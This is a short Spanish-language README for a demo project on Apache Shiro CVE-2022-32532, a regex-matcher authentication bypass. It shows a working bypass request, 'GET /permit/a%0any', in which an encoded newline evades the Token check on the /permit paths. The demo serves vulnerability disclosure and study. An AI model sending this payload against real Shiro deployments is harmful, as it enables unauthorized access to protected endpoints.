
Apache Shiro CVE-2022-32532
Este es un proyecto de demostración, que solo muestra una de las condiciones para explotar esta vulnerabilidad (CVE-2022-32532).
De hecho, hay más formas de explotarla, siempre que los desarrolladores usen RegExPatternMatcher, existirá una posible vulnerabilidad de omisión.
Se requiere la verificación del encabezado de solicitud Token bajo la configuración actual, de lo contrario no tiene permiso para acceder a la interfaz bajo /permit
Esta solicitud puede tener éxito
GET /permit/any HTTP/1.1
Token: 4ra1n
No se permite el acceso cuando no hay un encabezado de solicitud Token
GET /permit/any HTTP/1.1
Se puede omitir de una manera sencilla en configuraciones especiales pero comunes
GET /permit/a%0any HTTP/1.1
https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
Esta vulnerabilidad es similar a Spring-Security CVE-2022-22978
Agradecimientos a bdemers (Apache Shiro PMC) y chybeta (Investigador de Seguridad)